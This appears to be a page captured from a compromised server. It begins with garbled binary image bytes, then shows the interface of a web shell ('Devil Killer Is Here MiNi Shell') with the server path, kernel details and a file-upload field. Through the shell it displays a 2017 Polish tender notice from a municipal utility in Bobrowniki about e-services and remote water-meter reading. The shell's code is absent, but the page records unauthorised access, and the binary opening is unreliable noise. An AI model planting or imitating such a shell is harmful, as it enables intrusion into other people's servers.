JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170630/542745-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 542745-N-2017 z dnia 2017-06-30 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zakład Gospodarki Komunalnej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">,,Wdrożenie elektronicznej obsługi klienta wraz z systemem zdalnego odczytu wodomierzy i zarządzania cmentarzem na potrzeby Zakładu Gospodarki Komunalnej w Bobrownikach"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Wsparcie rozwoju cyfrowych usług publicznych, w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Tak</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zakład Gospodarki Komunalnej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27150052800000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Sienkiewicza</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu"></span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">42583 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Bobrowniki</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">032 287 41 99, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zgk@bobrowniki.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">032 287 41 99</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.zgk.bobrowniki.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Jednostki organizacyjne administracji samorządowej</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.zgk.bobrowniki.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.zgk.bobrowniki.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">poczta tradycyjna, osobiście w sekretariacie firmy </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">42583 Bobrowniki ul. Sienkiewicza 121 B</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">,,Wdrożenie elektronicznej obsługi klienta wraz z systemem zdalnego odczytu wodomierzy i zarządzania cmentarzem na potrzeby Zakładu Gospodarki Komunalnej w Bobrownikach"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP/ZGK/03/2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Zadanie nr 1:Zakup podstawowej infrastruktury sprzętowej wymaganej do realizacji projektuCel i założenia:Zakup i dostawa wraz z instalacją i uruchomieniem podstawowego sprzętu komputerowego, informatycznego i teleinformatycznego niezbędnego dla pobierania danych pomiarowych i przetwarzania na sygnał radiowy i zapis elektroniczny (informatyczny) a także niezbędnego dla obsługi oprogramowania specjalistycznego oraz realizacji i udostępniania e-usług.Głównymi planowanymi i niezbędnymi urządzeniami są:1.	Komputery przenośne typu notebook wraz z systemem operacyjnym - 3 szt.2.	Zestawy komputerowe stacjonarne typu All in One (stacja robocza wraz z systemem operacyjnym, klawiaturą oraz monitorem o przekątnej co najmniej monitor 21 cali) - 10 szt.3.	Stacje robocze mobilne do odczytu radiowego oraz importu z mobilnych terminali (komputery przenośne typu notebook wraz z systemem operacyjnym) - 4 szt.4.	Urządzenia mobilne typu tablet wraz z systemem operacyjnym i ekranem o przekątnej ekranu min. 10" dedykowane do obsługi multimedialnego generatora powiadomień np. o zgłoszeniach awarii (niezbędne do stałego podtrzymania pracy i nadzoru systemów obsługujących e-usługi) - 4 szt.5.	Tablica multimedialna dla działu mieszkańców i administrującego systemami i realizacją e-usług - ułatwia bieżący dostęp do danych zawartych w aplikacjach obsługujących e-usługi poprzez ich prezentowanie w sposób dostępny dla wszystkich klientów (mieszkańców i podmiotów) jednocześnie - 1 szt.6.	Firewall;Rezultatem tego zadania winno być przygotowanie infrastruktury sprzętowej dla rozpoczęcia wdrożenia oraz przyszłej eksploatacji nowych systemów oraz usług publicznych e-woda oraz e-cmentarz w Zakładzie Gospodarki Komunalnej w Bobrownikach oraz na rzecz automatyzacji procesów pomiędzy nim a klientami (mieszkańcami i podmiotami).Zamawiający wymaga i oczekuje współpracy z Wykonawcami pozostałych zadań w zakresie współdziałania oraz integracji sprzętu i oprogramowania celem osiągnięcia wspólnego rezultatu jakim jest spójny i integralny ,,Teleinformatyczny system pomiarowo- rozliczeniowy ZGK Bobrowniki".Termin realizacji do 31.08.2017 r.Szczegółowy opis wymagań w ramach zadania zawarty jest w Załączniku nr 1 - Zadanie 1.Zadanie nr 2:Zakup infrastruktury serwerowej i osprzętu wymaganego do realizacji projektuCel i założenia:Zakup i dostawa wraz z instalacją i uruchomieniem sprzętu komputerowego, informatycznego i teleinformatycznego niezbędnego dla pobierania danych pomiarowych i przetwarzania na sygnał radiowy i zapis elektroniczny (informatyczny w bazie danych) a także niezbędnego dla obsługi oprogramowania specjalistycznego oraz realizacji i udostępniania e-usług.Głównymi planowanymi i niezbędnymi urządzeniami są:1.	Serwer główny wraz monitorem i systemem operacyjnym dla aplikacji i bazy danych systemów informatycznych przeznaczonych do realizacji e-usług - 1 szt.2.	Serwer kopii zapasowych wraz z monitorem i systemem operacyjnym do wykonywania, przechowywania i udostępniania kopii zapasowych aplikacji i bazy danych systemów informatycznych obsługujących e-usługi - 1 szt.3.	Zasilacz awaryjny typu UPS dla podtrzymania napięcia w serwerach w sytuacjach braku zasilania. Niezbędny dla zapewnienia ciągłości pracy serwera w sytuacjach awaryjnych - 1 szt.Rezultatem tego zadania winno być przygotowanie infrastruktury sprzętowej serwerowej dla rozpoczęcia wdrożenia oraz przyszłej eksploatacji nowych systemów oraz e-usług publicznych woda oraz cmentarz w Zakładzie Gospodarki Komunalnej w Bobrownikach oraz na rzecz automatyzacji procesów pomiędzy nim a klientami (mieszkańcami i podmiotami).Zamawiający wymaga i oczekuje współpracy z Wykonawcami pozostałych zadań w zakresie współdziałania oraz integracji sprzętu i oprogramowania celem osiągnięcia wspólnego rezultatu jakim jest spójny i integralny ,,Teleinformatyczny system pomiarowo- rozliczeniowy ZGK Bobrowniki".Termin realizacji do 31.08.2017 r.Szczegółowy opis wymagań w ramach zadania zawarty jest w Załączniku nr 1 - Zadanie 2. Zadanie nr 3:Niezbędna informacja i promocja projektu oraz wdrożenie usługi e-wodaW zakresie informacji i promocji projektu zadanie obejmuje:Cel i założenia:Dostawa i zamontowanie obowiązkowych treści informacyjno-promocyjnych na rzecz i w ramach projektu, zgodnie z art. 8-9 Rozporządzenia Komisji (WE) nr 1828/2006, ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady (WE) nr 1083/2006, ustanawiającego ogólne przepisy dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego i Funduszu Spójności oraz Rozporządzenia (WE) nr 1080/2006 Parlamentu Europejskiego i Rady w sprawie Europejskiego Funduszu Rozwoju Regionalnego, a także z Wytycznymi Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2014-2020 dla beneficjentów w zakresie informacji i promocji.W związku z udziałem finansowym środków budżetu UE w projekcie niezbędne jest przeprowadzenie niezbędnych działań informacyjnych i promocyjnych na rzecz których wymagane jest :1.	Dostarczenie trwałych oznaczeń (np. nalepek) na sprzęty - naklejki/oznaczenia informacyjne na sprzęty komputerowe oraz nakładki zgodne z wytycznymi i materiałami ramowymi RPO WSL 2014-2020, które będą instalowane wraz z urządzeniami - 3500 szt.2.	Dostarczenie i zamieszczenie odpowiednich tablic informacyjnych w obiekcie Zamawiającego - tablica informacyjno-promocyjna w ramach projektu - 1 szt.	Materiały te winny być zgodne z dokumentami ramowymi :a)	Podręcznik wnioskodawcy i beneficjenta programów polityki spójności;b)	Księga identyfikacji wizualnej znaku marki Fundusze Europejskie i znaków programów polityki spójności na lata 2014-2020.Wykonawca dostarczy te materiały w terminie :o	do 31.08.2017 r tablica informacyjno-promocyjna;o	do 31.12.2017 r naklejki/oznaczenia informacyjne (jednorazowo bądź sukcesywnie wraz z dostawami urządzeń).Wdrożenie usługi e-woda obejmujące niezbędny sprzęt oraz oprogramowanieCel i założenia:Zakup, dostawa, instalacja, wdrożenie i uruchomienie niezbędnego oprogramowania specjalistycznego w dziedzinie przetwarzania, obsługi i rozliczania odczytów wodomierzy dla realizacji e-usługi. Wymagane jest przekazanie kodów źródłowych oprogramowania wytworzonego przez Wykonawcę w formatach powszechnie dostępnych a w tym:a)	kody źródłowe bazy danych;b)	kody oprogramowania głównego;c)	opisaną strukturę tabel oraz powiązania między nimi.Przy czym nie obejmuje to oprogramowania niezbędnego a pochodzącego od producentów zewnętrznych co do których Wykonawca nie posiada praw autorskich lub z powodu innych uwarunkowań prawnych nie może ich przekazać. W takich sytuacjach dopuszcza się, że Wykonawca wskaże miejsce depozytu kodów źródłowych z uprawnieniem Zamawiającego do dostępu i korzystania z tychże kodów w określonych sytuacjach a to:a)	w przypadku upadłości lub likwidacji dostawy oprogramowania;b)	w przypadku odmowy świadczenia serwisu lub usług utrzymaniowych przez dostawcę Oprogramowania;c)	w przypadku wady Oprogramowania, której nie chce usunąć dostawca oprogramowania;d)	w przypadku zmiany warunków świadczenia usług serwisowych lub utrzymaniowych ponad ustalone dopuszczalne zmiany.Dopuszcza się złożenie kodów źródłowych do depozytu notarialnego, skrytki bankowej lub w firmie profesjonalnie zajmującej się świadczeniem deponowania kodów źródłowych. Rezultatem winien być system teleinformatyczny z elementem radiowego zdalnego odczytu, bazujący na wskazaniach wodomierza wyposażonego w element impulsujący (urządzenie pomiarowe typu nakładka). Moduł radiowy winien zliczać cykle wodomierza i przekazywać informacje. Liczba ta jest przechowywana w pamięci modułu radiowego.W skład wymaganego systemu winny wchodzić co najmniej urządzenie pomiarowe typu nakładka na wodomierz z radiowym przekazem odczyt wraz z instalacją i uruchomieniem - Przy czym wymaga się tychże urządzeń w następujących ilościach: a)	urządzenia pomiarowe typu nakładka na wodomierz z radiowym przekazem odczytu w standardzie IP65- 2000 szt.b)	urządzenia pomiarowe typu nakładka na wodomierz z radiowym przekazem odczytu wraz z przedłużonym torem antenowym w standardzie IP68 (do eksploatacji w studzienkach) - 500 szt.c)	Urządzenie pomiarowe z funkcją radiowego odczytu danych (Terminal do odczytu i konwerter do przetwarzania i dalszego przekazywania oraz udostępniania w ramach realizacji e-usługi) - 4 szt.Założenia techniczne realizacji i wdrożenia urządzeń :1.	Nakładki czyli urządzenie pomiarowe z radiowym przekazem odczytu - urządzenie teleinformatyczne obsługujące przetwarzanie sygnału pomiarowego na postać radiową oraz ostatecznie zapisu informatycznego w bazie danych. Urządzenia zainstalowane na terenie Gminy w lokalizacjach wg wykazu Zamawiającego.Urządzenia zliczające cykle elementu impulsującego wodomierza, wykrywające zdarzenia. Wszystkie informacje przekazywane są do urządzenia mobilnego. 2.	Urządzenie pomiarowe mobilne z funkcją radiowego odczytu danych (Terminal do odczytu i konwerter do przetwarzania i dalszego przekazywania oraz udostępniania w ramach realizacji e-usługi) - 4 szt. Urządzenie to stanowi element gromadzący informacje z modułów radiowych o odczytach oraz zdarzeniach występujących w obrębie instalacji telemetrycznej. Urządzenia mobilne wykorzystujące sieć GSM do przesyłania danych do bazy danych na serwerze Zamawiającego.3.	Przy czym urządzenia pomiarowe winny być zainstalowane, wdrożone, sprawdzone funkcjonalnie i technicznie oraz uruchomione w lokalizacjach wskazanych przez Zamawiającego na podstawie wykazu Zamawiającego.4.	Oprogramowanie specjalistyczne do gromadzenia, przetwarzania i udostępniania danych o odczytach i związanych z nimi rozliczeniach obejmujące co najmniej :a)	Dostawa licencji oprogramowania specjalistycznego w dziedzinie przetwarzania, obsługi i rozliczania odczytów wodomierzy wraz z niezbędnym systemem bazy danych dla realizacji e-usługi;b)	Wykonanie usług informatycznych niezbędnych dla instalacji i uruchomienia aplikacji i oprogramowania specjalistycznego w dziedzinie przetwarzania, obsługi i rozliczania odczytów wodomierzy dla realizacji e-usługi;c)	Migracja danych do nowego oprogramowania specjalistycznego w dziedzinie przetwarzania, obsługi i rozliczania odczytów wodomierzy. Przy zapewnieniu zgodności danych poddanych migracji z posiadanymi i dotychczas eksploatowanymi wodomierzami.Urządzenia pomiarowe winny być dostarczone, zainstalowane, sprawdzone funkcjonalnie i technicznie oraz uruchomione we wskazanych przez Zamawiającego lokalizacjach na terenie Gminy Bobrowniki wg wykazu.Wszystkie wymienione urządzenia i sprzęty są niezbędne dla wdrożenia i eksploatacji przyszłych systemów i e-usług publicznych oraz osiągnięcia planowanych celów i rezultatówprojektu.Wymagane jest dokonanie niezbędnej integracji z aktualnie eksploatowanym Systemem Informatycznym marki COMARCH ERP OPTIMA wspierającym zarządzanie firmą Zamawiającego.Integracja ta winna obejmować co najmniej :a)	wspólną i ujednoliconą bazę słownikową (normatywną),b)	wspólną i ujednoliconą Kartotekę Osobową,c)	wspólną i ujednoliconą bazę faktur i rozrachunków (faktura inicjowana w systemie e-usługi),d)	przepływ danych o rozrachunkach i rozliczeniach finansowych z modułów obecnie eksploatowanego systemu COMARCH ERP OPTIMA do systemu e-usługi,e)	przepływ danych pomiędzy modułami obecnie eksploatowanego systemu do systemu e-usługi.Zamawiający informuje, że wyłoniony Wykonawca zamówienia otrzyma do wglądu posiadane przez Zamawiającego struktury danych obecnie eksploatowanego systemu przy zachowaniu następujących warunków :a)	struktury danych będą udostępnione tylko w zakresie niezbędnym dla wykonania zamówienia,b)	struktury będą udostępnione tylko po złożeniu przez Wykonawcę pisemnej deklaracji zachowania ich w poufności i nie wykorzystywaniu do celów innych niż wykonanie zamówienia. Zamawiający wymaga i oczekuje współpracy z Wykonawcami pozostałych zadań w zakresie współdziałania oraz integracji sprzętu i oprogramowania celem osiągnięcia wspólnego rezultatu jakim jest spójny i integralny ,,Teleinformatyczny system pomiarowo- rozliczeniowy ZGK Bobrowniki".Termin 